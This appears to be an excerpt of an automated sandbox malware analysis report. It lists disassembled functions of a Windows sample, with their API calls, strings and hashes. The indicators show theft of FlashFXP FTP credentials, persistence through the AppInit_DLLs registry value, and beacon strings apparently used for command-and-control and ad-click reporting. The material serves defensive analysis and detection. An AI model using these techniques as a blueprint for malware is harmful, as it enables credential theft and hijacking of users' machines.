Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Strings

ftp://%S:%S@%S:%u, xrefs: 004049F6
ftplist.txt, xrefs: 00404805

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
String ID: ftp://%S:%S@%S:%u$ftplist.txt
API String ID: 1635188419-1322549247
Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407362 Relevance: 13.6, APIs: 9, Instructions: 114timesynchronizationCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
GetLocalTime.KERNEL32(?), ref: 00407387
GetLocalTime.KERNEL32(?), ref: 0040738D
GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
String ID:
API String ID: 3166187867-0
Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004089FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

+@, xrefs: 004089FD
http, xrefs: 00408B59

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID:
String ID: http$+@
API String ID: 0-4127549746
Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403740 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804

Strings

&, xrefs: 004037EA
datafolder, xrefs: 0040376D
*flashfxp*, xrefs: 004037CE
SOFTWARE\FlashFXP\3, xrefs: 0040375E
#, xrefs: 004037DC

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
API String ID: 1994525040-4055253781
Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409909 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004099EB
SysAllocString.OLEAUT32(?), ref: 004099F9

Strings

<url>, xrefs: 0040991C
http://, xrefs: 00409941
</url>, xrefs: 00409917
</domain>, xrefs: 004099B8
<domain>, xrefs: 004099BD

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: AllocString
String ID: </domain>$</url>$<domain>$<url>$http://
API String ID: 2525500382-924421446
Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99

Uniqueness

Uniqueness Score: -1.00%

Function 00408F26 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
SysFreeString.OLEAUT32(0000000B), ref: 00409046

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC93 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 105sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
Sleep.KERNEL32(0000EA60), ref: 0040AD76
Sleep.KERNEL32(00002710), ref: 0040ADA4

Strings

job^rev=%s^os=%s, xrefs: 0040ACDB
hOA, xrefs: 0040ACC0
0, xrefs: 0040AD12
^rcn=1, xrefs: 0040AD37
d, xrefs: 0040ADB6

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Sleep$AttemptConnectInternet
String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
API String ID: 362191241-2593661552
Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D790 Relevance: 10.8, APIs: 7, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0040D892
__FindPESection.LIBCMT ref: 0040D8AC

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408825 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004088E4
SysFreeString.OLEAUT32(?), ref: 004088E9
SysFreeString.OLEAUT32(?), ref: 004089D3
SysFreeString.OLEAUT32(?), ref: 004089D8
SysFreeString.OLEAUT32(?), ref: 004089F3

Strings

+@, xrefs: 0040884C

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: FreeString
String ID: +@
API String ID: 3341692771-3835504741
Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A786 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 121sleepmemoryCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Strings

0, xrefs: 0040A848
confirm^rev=%s^code=%s^param=%s^os=%s, xrefs: 0040A7BA

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
API String ID: 3100629401-2436734164
Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040253C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113sleepprocessfileCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

_memset.LIBCMT ref: 004025DA
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D

Strings

none, xrefs: 00402614

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
String ID: none
API String ID: 2353737338-2140143823
Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 004094B6 Relevance: 10.6, APIs: 7, Instructions: 81COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094E6

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040A245 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A26B
SysAllocString.OLEAUT32(?), ref: 0040A28E
SysAllocString.OLEAUT32(?), ref: 0040A296
SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
SysFreeString.OLEAUT32(?), ref: 0040A2CF

Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009

Strings

J(@, xrefs: 0040A29E, 0040A2A1

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
String ID: J(@
API String ID: 3143865713-2848800318
Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040782A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60filetimeCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
CloseHandle.KERNEL32(00000000), ref: 00407880
GetTickCount.KERNEL32 ref: 00407888

Strings

UniqueNum, xrefs: 00407836

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$CloseCountCreateHandleModuleNameTickTime
String ID: UniqueNum
API String ID: 1853814767-3816303966
Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00407E2B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 54fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

d, xrefs: 00407E7E
UniqueNum, xrefs: 00407E38
hOAd, xrefs: 00407E91
x, xrefs: 00407E86

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$CreateModuleNamePointerRead
String ID: UniqueNum$d$hOAd$x
API String ID: 1528952607-1018652783
Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00408604 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
GetLastError.KERNEL32(?,00000000), ref: 0040864A

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

Strings

AppInit_DLLs, xrefs: 00408639, 00408671
Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00408619, 0040861E, 00408676
C:\WINDOWS\system32\gbdwpbm.dll, xrefs: 00408682

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
API String ID: 4026185228-3265104503
Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD

Uniqueness

Uniqueness Score: -1.00%

Function 00409A99 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409B00
SysAllocString.OLEAUT32(?), ref: 00409B0E

Strings

<url>, xrefs: 00409AD1
</url>, xrefs: 00409ACC
</title>, xrefs: 00409AA7
<title>, xrefs: 00409AAC

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: AllocString
String ID: </title>$</url>$<title>$<url>
API String ID: 2525500382-2286408829
Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8F9 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 161sleepmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
Sleep.KERNEL32(00002710), ref: 0040AAC1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
HeapFree.KERNEL32(00000000), ref: 0040AAF0

Strings

jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
0, xrefs: 0040AA5B

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: HeapSleep$AttemptConnectFreeInternetProcess
String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
API String ID: 3713053250-1268808612
Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
